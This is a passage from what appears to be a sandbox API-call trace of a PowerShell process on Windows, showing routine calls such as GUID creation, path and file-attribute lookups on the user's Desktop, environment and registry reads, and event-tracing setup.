Data3=0x4325, Data4=([0]=0xa5, [1]=0xf1, [2]=0xe6, [3]=0x91, [4]=0xb4, [5]=0xfb, [6]=0x8, [7]=0x2f))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x49247248, Data2=0xc822, Data3=0x48ad, Data4=([0]=0x90, [1]=0xfc, [2]=0x8a, [3]=0x24, [4]=0x80, [5]=0x82, [6]=0x6a, [7]=0xda))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xc43b09a3, Data2=0x1690, Data3=0x430e, Data4=([0]=0xb5, [1]=0xdf, [2]=0x9c, [3]=0xf3, [4]=0xae, [5]=0x3c, [6]=0x99, [7]=0x1f))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xe76bf725, Data2=0x6ccf, Data3=0x40ba, Data4=([0]=0xa8, [1]=0x9c, [2]=0xc0, [3]=0x28, [4]=0xec, [5]=0x38, [6]=0x9f, [7]=0xa0))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xba05042d, Data2=0xedd0, Data3=0x4e47, Data4=([0]=0xb7, [1]=0x4e, [2]=0x85, [3]=0xc2, [4]=0x3, [5]=0xc0, [6]=0x71, [7]=0xf6))) returned 0x0 [0143.064] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xc9fd792d, Data2=0xa74a, Data3=0x4c2f, Data4=([0]=0xb6, [1]=0xb, [2]=0x94, [3]=0x7b, [4]=0x46, [5]=0x9f, [6]=0x9e, [7]=0x6e))) returned 0x0 [0143.065] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x1ea77940, Data2=0x7f3f, Data3=0x46a3, Data4=([0]=0x94, [1]=0x63, [2]=0x52, [3]=0xea, [4]=0xe9, [5]=0x5, [6]=0x7, [7]=0x42))) returned 0x0 [0143.065] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x4b836762, Data2=0x11d2, Data3=0x492a, Data4=([0]=0xab, [1]=0xb9, [2]=0xb7, [3]=0x81, [4]=0xe7, [5]=0x9c, [6]=0xc2, [7]=0xa7))) returned 0x0 [0143.065] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x44315e47, Data2=0xdb85, Data3=0x4bb6, Data4=([0]=0x9c, [1]=0xf6, [2]=0x62, [3]=0x8c, [4]=0x83, [5]=0x14, [6]=0x4b, [7]=0xaf))) returned 0x0 [0143.347] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xc611839d, Data2=0xf3c8, Data3=0x4dcb, Data4=([0]=0xbe, [1]=0x90, [2]=0x50, [3]=0xdc, [4]=0x42, [5]=0xcd, [6]=0x46, [7]=0x3a))) returned 0x0 [0143.349] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xffea3ec9, Data2=0x91ba, Data3=0x4a19, Data4=([0]=0xb6, [1]=0x16, [2]=0x20, [3]=0xe7, [4]=0x3a, [5]=0x82, [6]=0x71, [7]=0xc4))) returned 0x0 [0143.349] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xc5bc8fdc, Data2=0xe7f4, Data3=0x4384, Data4=([0]=0xb7, [1]=0x37, [2]=0xff, [3]=0xc4, [4]=0xbc, [5]=0x48, [6]=0xa7, [7]=0xe))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xbbe4af27, Data2=0xfc3b, Data3=0x4934, Data4=([0]=0xaf, [1]=0x9c, [2]=0x52, [3]=0xe9, [4]=0x18, [5]=0xd0, [6]=0xa2, [7]=0x44))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xae429e5e, Data2=0x3182, Data3=0x44c3, Data4=([0]=0x90, [1]=0x7c, [2]=0xe9, [3]=0x44, [4]=0x42, [5]=0x5, [6]=0x71, [7]=0xa0))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x4af2caaa, Data2=0x2620, Data3=0x48c0, Data4=([0]=0x82, [1]=0xff, [2]=0xad, [3]=0x4b, [4]=0xfd, [5]=0x26, [6]=0x7c, [7]=0xa6))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x3e2955ca, Data2=0x2a16, Data3=0x4613, Data4=([0]=0xbe, [1]=0x1b, [2]=0x27, [3]=0xbb, [4]=0x9c, [5]=0xa3, [6]=0xe0, [7]=0xf6))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x547f2a98, Data2=0x93ae, Data3=0x43fc, Data4=([0]=0xb0, [1]=0xac, [2]=0x79, [3]=0xc, [4]=0x94, [5]=0x55, [6]=0xb7, [7]=0xc8))) returned 0x0 [0143.350] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xc2da7062, Data2=0xb420, Data3=0x42ff, Data4=([0]=0x8e, [1]=0xf, [2]=0x9, [3]=0x2d, [4]=0x37, [5]=0xe2, [6]=0x90, [7]=0xc7))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xa044f86c, Data2=0x18a8, Data3=0x49c5, Data4=([0]=0x8a, [1]=0x9c, [2]=0x47, [3]=0x13, [4]=0xbe, [5]=0x8a, [6]=0xa9, [7]=0xb3))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x4899bdaa, Data2=0xe0ef, Data3=0x4441, Data4=([0]=0xb0, [1]=0xaa, [2]=0xed, [3]=0xdf, [4]=0x64, [5]=0xa3, [6]=0x66, [7]=0x69))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x2c79277e, Data2=0xb17f, Data3=0x4f2f, Data4=([0]=0xae, [1]=0xc3, [2]=0xbc, [3]=0xe, [4]=0x82, [5]=0x32, [6]=0x51, [7]=0x8d))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x4aabbde8, Data2=0x5725, Data3=0x475a, Data4=([0]=0xbe, [1]=0x1c, [2]=0xc5, [3]=0xc0, [4]=0x58, [5]=0x2b, [6]=0x40, [7]=0x7c))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x22d0e1e2, Data2=0x1a44, Data3=0x4269, Data4=([0]=0xae, [1]=0x5e, [2]=0x8c, [3]=0xfd, [4]=0xf8, [5]=0x6f, [6]=0x76, [7]=0x45))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xe0083213, Data2=0x158, Data3=0x4ba0, Data4=([0]=0x9f, [1]=0x44, [2]=0xd7, [3]=0xa8, [4]=0x3a, [5]=0xa7, [6]=0x9e, [7]=0x0))) returned 0x0 [0143.351] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xb4cb2e30, Data2=0x6dea, Data3=0x4bde, Data4=([0]=0x86, [1]=0x88, [2]=0xea, [3]=0x82, [4]=0x52, [5]=0xcf, [6]=0xf4, [7]=0xbe))) returned 0x0 [0143.414] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xd97bad6b, Data2=0x1640, Data3=0x4a1a, Data4=([0]=0x99, [1]=0xeb, [2]=0x4b, [3]=0xd3, [4]=0xce, [5]=0x89, [6]=0x11, [7]=0xe5))) returned 0x0 [0143.415] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xadd0ea3e, Data2=0x2ed5, Data3=0x4bbb, Data4=([0]=0xbf, [1]=0xc3, [2]=0x4b, [3]=0xbe, [4]=0xd4, [5]=0xff, [6]=0xa5, [7]=0xf6))) returned 0x0 [0143.415] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x701a826e, Data2=0x7d14, Data3=0x49cb, Data4=([0]=0xa3, [1]=0xa5, [2]=0x40, [3]=0x62, [4]=0x26, [5]=0xbf, [6]=0x5, [7]=0xf0))) returned 0x0 [0145.846] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x502fba03, Data2=0x1e22, Data3=0x433c, Data4=([0]=0x96, [1]=0x20, [2]=0x91, [3]=0x7f, [4]=0xd7, [5]=0x5e, [6]=0xf, [7]=0x6a))) returned 0x0 [0145.846] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x6b521984, Data2=0x2b5, Data3=0x4c48, Data4=([0]=0x95, [1]=0x7c, [2]=0xdf, [3]=0x3d, [4]=0x63, [5]=0x3c, [6]=0xce, [7]=0x84))) returned 0x0 [0145.847] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x30644c43, Data2=0x9d4b, Data3=0x416d, Data4=([0]=0xa9, [1]=0xa, [2]=0x8d, [3]=0xa5, [4]=0x19, [5]=0xd5, [6]=0xc6, [7]=0x76))) returned 0x0 [0145.847] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xf9f8c3bc, Data2=0xcb5, Data3=0x4ddc, Data4=([0]=0x9d, [1]=0x5c, [2]=0x33, [3]=0xf, [4]=0xf2, [5]=0x5, [6]=0xa4, [7]=0x9b))) returned 0x0 [0145.847] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x69b3866d, Data2=0xbd19, Data3=0x4347, Data4=([0]=0x8e, [1]=0x53, [2]=0x90, [3]=0xe0, [4]=0x95, [5]=0x86, [6]=0x37, [7]=0xc4))) returned 0x0 [0145.847] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xd9ed9a77, Data2=0xeb10, Data3=0x469d, Data4=([0]=0xa0, [1]=0xec, [2]=0x70, [3]=0x83, [4]=0xe0, [5]=0xb0, [6]=0x91, [7]=0x29))) returned 0x0 [0145.847] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x2342d289, Data2=0x32ff, Data3=0x47d7, Data4=([0]=0x87, [1]=0xd5, [2]=0x31, [3]=0x41, [4]=0x9, [5]=0xc1, [6]=0x56, [7]=0x8f))) returned 0x0 [0145.848] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x2b72ab9c, Data2=0xd5ef, Data3=0x4638, Data4=([0]=0xaa, [1]=0xd5, [2]=0xb, [3]=0x30, [4]=0xb8, [5]=0x3b, [6]=0x33, [7]=0x34))) returned 0x0 [0145.848] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x6e789397, Data2=0x88d8, Data3=0x409b, Data4=([0]=0x8b, [1]=0x47, [2]=0x35, [3]=0x42, [4]=0xef, [5]=0x5, [6]=0xf7, [7]=0x62))) returned 0x0 [0146.868] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x953d0fbe, Data2=0x3d35, Data3=0x40f8, Data4=([0]=0x98, [1]=0xf7, [2]=0x69, [3]=0x16, [4]=0x3b, [5]=0x12, [6]=0x2f, [7]=0xa7))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xb9150552, Data2=0xac7e, Data3=0x445b, Data4=([0]=0x8c, [1]=0x63, [2]=0x35, [3]=0x95, [4]=0x24, [5]=0xd2, [6]=0xc2, [7]=0xd1))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x89878146, Data2=0x6dc3, Data3=0x4de1, Data4=([0]=0xb8, [1]=0xe9, [2]=0x99, [3]=0x24, [4]=0x56, [5]=0x86, [6]=0x74, [7]=0xed))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xe1328766, Data2=0x54e8, Data3=0x4d39, Data4=([0]=0x9d, [1]=0x34, [2]=0xb6, [3]=0x38, [4]=0xcd, [5]=0x89, [6]=0xb8, [7]=0x69))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xfb9dcddb, Data2=0x22aa, Data3=0x4bb4, Data4=([0]=0x97, [1]=0x10, [2]=0xac, [3]=0x9f, [4]=0x77, [5]=0xd8, [6]=0xbd, [7]=0xbc))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xe6c02d5f, Data2=0x3096, Data3=0x4e1f, Data4=([0]=0x9b, [1]=0x17, [2]=0xb5, [3]=0xd7, [4]=0x53, [5]=0x43, [6]=0x61, [7]=0x25))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x5e798b3a, Data2=0x9be0, Data3=0x451e, Data4=([0]=0x91, [1]=0xdc, [2]=0x9, [3]=0x65, [4]=0x4c, [5]=0xb8, [6]=0x63, [7]=0x5d))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xfbe812bd, Data2=0x4e63, Data3=0x4c2f, Data4=([0]=0x94, [1]=0x7a, [2]=0x2, [3]=0xa1, [4]=0x4, [5]=0x59, [6]=0x16, [7]=0x56))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x72559fb0, Data2=0x319b, Data3=0x4292, Data4=([0]=0xb7, [1]=0xbf, [2]=0xec, [3]=0x7, [4]=0x81, [5]=0x62, [6]=0xe4, [7]=0x9c))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xb639357c, Data2=0xb93c, Data3=0x43b3, Data4=([0]=0xbc, [1]=0xb1, [2]=0xcd, [3]=0xe5, [4]=0xdc, [5]=0xf6, [6]=0x8d, [7]=0x53))) returned 0x0 [0146.871] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xd80b111, Data2=0x533, Data3=0x4339, Data4=([0]=0xa9, [1]=0xd1, [2]=0x1a, [3]=0xd9, [4]=0x11, [5]=0x95, [6]=0x8c, [7]=0x9a))) returned 0x0 [0146.881] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x13e95389, Data2=0x2c30, Data3=0x43ae, Data4=([0]=0xa2, [1]=0x90, [2]=0xc4, [3]=0x70, [4]=0x7d, [5]=0xd3, [6]=0xd6, [7]=0xc6))) returned 0x0 [0146.883] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xed9f466, Data2=0x478a, Data3=0x496f, Data4=([0]=0xac, [1]=0xef, [2]=0x56, [3]=0xb1, [4]=0xa2, [5]=0xa7, [6]=0xba, [7]=0x26))) returned 0x0 [0147.705] GetLogicalDrives () returned 0x4 [0147.705] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0147.705] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.715] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0147.715] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x133ac60 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0147.725] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0147.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="∠ij叠Į㊴畮㊤畮\x0e") returned 0x0 [0147.725] CoTaskMemFree (pv=0x12d5e20) [0147.727] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0147.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="∠ij叠Į㊴畮㊤畮\x0e") returned 0x0 [0147.727] CoTaskMemFree (pv=0x12d5e20) [0147.727] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0147.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="∠ij叠Į㊴畮㊤畮\x0e") returned 0x0 [0147.727] CoTaskMemFree (pv=0x12d5e20) [0147.865] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0147.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="∠ij叠Į㊴畮㊤畮\x0e") returned 0x0 [0147.865] CoTaskMemFree (pv=0x12d5e20) [0147.896] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0147.902] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0147.902] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0147.903] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0147.904] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0147.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0147.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0147.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0147.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0147.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0148.081] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.541] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5285d10*="Available", lpRawData=0x5285c38) returned 1 [0148.554] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0148.554] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0148.555] CoTaskMemFree (pv=0x12d5e20) [0148.556] GetCurrentProcessId () returned 0x514 [0148.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe5d0 | out: phkResult=0xdbe5d0*=0x6b4) returned 0x0 [0148.558] RegQueryValueExW (in: hKey=0x6b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe5f0, lpData=0x0, lpcbData=0xdbe5ec*=0x0 | out: lpType=0xdbe5f0*=0x1, lpData=0x0, lpcbData=0xdbe5ec*=0x56) returned 0x0 [0148.558] RegQueryValueExW (in: hKey=0x6b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe5f0, lpData=0x528cc94, lpcbData=0xdbe5ec*=0x56 | out: lpType=0xdbe5f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe5ec*=0x56) returned 0x0 [0148.558] RegCloseKey (hKey=0x6b4) returned 0x0 [0148.902] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x133ac60 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0148.916] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0148.917] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0148.917] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0148.917] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0148.917] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0148.917] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0148.917] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0148.917] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0148.917] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0148.917] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0148.918] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.918] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.918] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0148.918] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0148.919] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0149.761] EtwEventRegister (in: ProviderId=0x529b314, EnableCallback=0x7252d7e, CallbackContext=0x0, RegHandle=0x529b2f0 | out: RegHandle=0x529b2f0) returned 0x0 [0149.761] EtwEventSetInformation (RegHandle=0x7623250, InformationClass=0x55, EventInformation=0x2, InformationLength=0x529b2b4) returned 0x0 [0149.774] EnumerateTraceGuidsEx () returned 0x0 [0149.775] GetCurrentProcessId () returned 0x514 [0149.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Winevt\\Publishers\\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbd69c | out: phkResult=0xdbd69c*=0x0) returned 0x2 [0149.871] GetCurrentProcessId () returned 0x514 [0150.647] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0150.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x12d5e20, nSize=0x104 | out: lpBuffer="∠ijⲸij") returned 0x0 [0150.647] CoTaskMemFree (pv=0x12d5e20) [0151.587] EtwEventWriteTransfer (RegHandle=0x12c9d48, EventDescriptor=0x2e, ActivityId=0xdbe7b0, RelatedActivityId=0xdbe750, UserDataCount=0x0, UserData=0x0) returned 0x0 [0151.587] GetCurrentProcessId () returned 0x514 [0151.587] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x514) returned 0x64c [0151.587] GetProcessTimes (in: hProcess=0x64c, lpCreationTime=0x52ca878, lpExitTime=0x52ca880, lpKernelTime=0x52ca888, lpUserTime=0x52ca890 | out: lpCreationTime=0x52ca878, lpExitTime=0x52ca880, lpKernelTime=0x52ca888, lpUserTime=0x52ca890) returned 1 [0151.587] CloseHandle (hObject=0x64c) returned 1 [0151.592] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0151.592] GetSystemDirectoryW (in: lpBuffer=0x12d5e20, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0151.592] CoTaskMemFree (pv=0x12d5e20) [0151.592] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0151.592] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0151.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe598) returned 1 [0151.592] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xdbe614 | out: lpFileInformation=0xdbe614*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0151.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe594) returned 1 [0151.609] WldpGetLockdownPolicy () returned 0x10000000 [0151.610] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0151.610] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x12d5e20 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0151.610] CoTaskMemFree (pv=0x12d5e20) [0151.610] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0151.610] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0151.610] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 